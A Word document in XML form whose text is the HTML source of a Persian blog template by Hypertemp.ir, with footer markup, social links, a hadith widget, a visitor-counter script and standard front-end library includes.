      <w:r>
        <w:t>" &gt;&lt;img src="http://up.hypertemp.ir/view/2519932/zarinpal.png" border="0" alt="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>دروازه پرداخت معتبر</w:t>
      </w:r>
      <w:r>
        <w:t>"&gt;&lt;/a&gt;');&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D8F7B4" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="#particles-js" rel="nofollow" class="top"&gt;&lt;i class="fa fa-angle-up"&gt;&lt;/i&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA35F54" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   &lt;div id="title"&gt;&lt;i class="fa fa-user fa-2x"&gt;&lt;/i&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>حديث</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8CD010" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">      &lt;div id="btns"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4116E425" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">        &lt;!-- kalam masoomin by www.1abzar.com ---&gt;&lt;script type="text/javascript" src="http://1abzar.ir/abzar/tools/behesht/?mod=&amp;c=333333&amp;bg=efefef&amp;kc=dddddd&amp;kadr=1&amp;n1=1&amp;n2=1&amp;n3=1&amp;n4=1&amp;n5=1&amp;n6=1&amp;n7=1&amp;n8=1&amp;n9=1&amp;n10=1&amp;n11=1&amp;n12=1&amp;n13=1&amp;n14=1"&gt;&lt;/script&gt;&lt;div style="display:none"&gt;&lt;h2&gt;&lt;a href="http://www.1abzar.com/abzar/behesht.php"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ابزار حديث</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;&lt;/h2&gt;&lt;/div&gt;&lt;!-- kalam masoomin by www.1abzar.com ---&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263B3815" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E352E6" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F01027" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA896C3" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;script type="text/javascript"&gt;function vmsNumber(e,m){document.getElementById(m).innerHTML=vmsDef++,vmsSetTimeout=setTimeout(function(){vmsNumber(e,m)},1),vmsDef&gt;e&amp;&amp;clearTimeout(vmsSetTimeout)}vmsDef=0;window.onload = vmsNumber([Blog_User],'rt-users-amount');vmsNumber([Blog_Comments],'rt-comments-amount');vmsNumber([Ip_Yesterday],'rt-tomarrow-amount');vmsNumber([Ip_Today],'rt-today-amount');vmsNumber([Blog_Posts],'rt-posts-amount');&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAC9493" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CCAE28" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77421DCD" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Top &amp; Zarinpal End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7E499E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="0DDB0DE4" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="27B08EFD" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6A4B5D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="77DA0540" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Copyright Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0208599F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="copyright"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1562D57F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="main-f"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA52D7A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="http://hypertemp.ir" rel="copyright" class="text"&gt;&lt;span&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>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t xml:space="preserve"> :&lt;/span&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>طراحي شده با</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &lt;i class="fa fa-heart"&gt;&lt;/i&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>کمي چاشني</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;i class="fa fa-html5"&gt;&lt;/i&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>و</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &lt;i class="fa fa-css3"&gt;&lt;/i&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>توسط هايپرتمپ دات آي آر</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACE5E9C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="social"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1076D7" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="http://telegram.me/Mrkianoosh" target="_blank" title="</w:t>
      </w:r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تلگرام ادم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پرتمپ</w:t>
      </w:r>
      <w:r>
        <w:t>" rel="nofollow" class="tg"&gt;&lt;i class="fa fa-paper-plane-o"&gt;&lt;/i&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ABECB9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="https://www.instagram.com/kianoosh_Cfz" target="_blank" title="</w:t>
      </w:r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نستاگرام</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ادم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پرتمپ</w:t>
      </w:r>
      <w:r>
        <w:t>" rel="nofollow" class="in"&gt;&lt;i class="fa fa-instagram"&gt;&lt;/i&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A54E25" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;a href="mailto:kianooshcfz@gmail.com" target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ارسال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به ادم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پرتمپ</w:t>
      </w:r>
      <w:r>
        <w:t>" class="mail"&gt;&lt;i class="fa fa-envelope-o"&gt;&lt;/i&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB3D295" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="6FA282C1" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="[RB:Blog_Xml_Link]" target="_blank" class="rss"&gt;&lt;i class="fa fa-rss"&gt;&lt;/i&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487F2424" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509A66FF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6E3062" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74430115" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Copyright End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498D6888" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="50F00472" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/footer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E7577E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Footer End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20143A97" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="43188713" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div id="load_time"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F02C40A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;script type="text/javascript" src="http://up.hypertemp.ir/view/2519958/fixto.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482768D5" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;script type="text/javascript" src="http://up.hypertemp.ir/view/2520535/footer-reveal.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AED8BDF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;script type="text/javascript" src="http://up.hypertemp.ir/view/2519947/particles.min.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761BB157" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;script type="text/javascript" src="http://up.hypertemp.ir/view/2520271/owl.carousel.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6F53D0" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;script type="text/javascript" src="http://up.hypertemp.ir/view/2520272/scroll.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEF1A1F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;script type="text/javascript" src="http://up.hypertemp.ir/view/2519946/java.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC9DCA5" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="1A22876D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="39B22023" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0187B9C2" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35728561" w14:textId="77777777" w:rsidR="004C09F8" w:rsidRPr="007D51C3" w:rsidRDefault="004C09F8" w:rsidP="007D51C3"/>
    <w:sectPr w:rsidR="004C09F8" w:rsidRPr="007D51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0C"/>
    <w:rsid w:val="004C09F8"/>
    <w:rsid w:val="005177DD"/>
    <w:rsid w:val="0073430C"/>
    <w:rsid w:val="007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31A381F-7845-4945-BBC4-CB2A0A07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5852</Words>
  <Characters>33358</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>277</Lines>
  <Paragraphs>78</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>39132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moradi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>saeed moradi</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-07T10:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-15T13:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>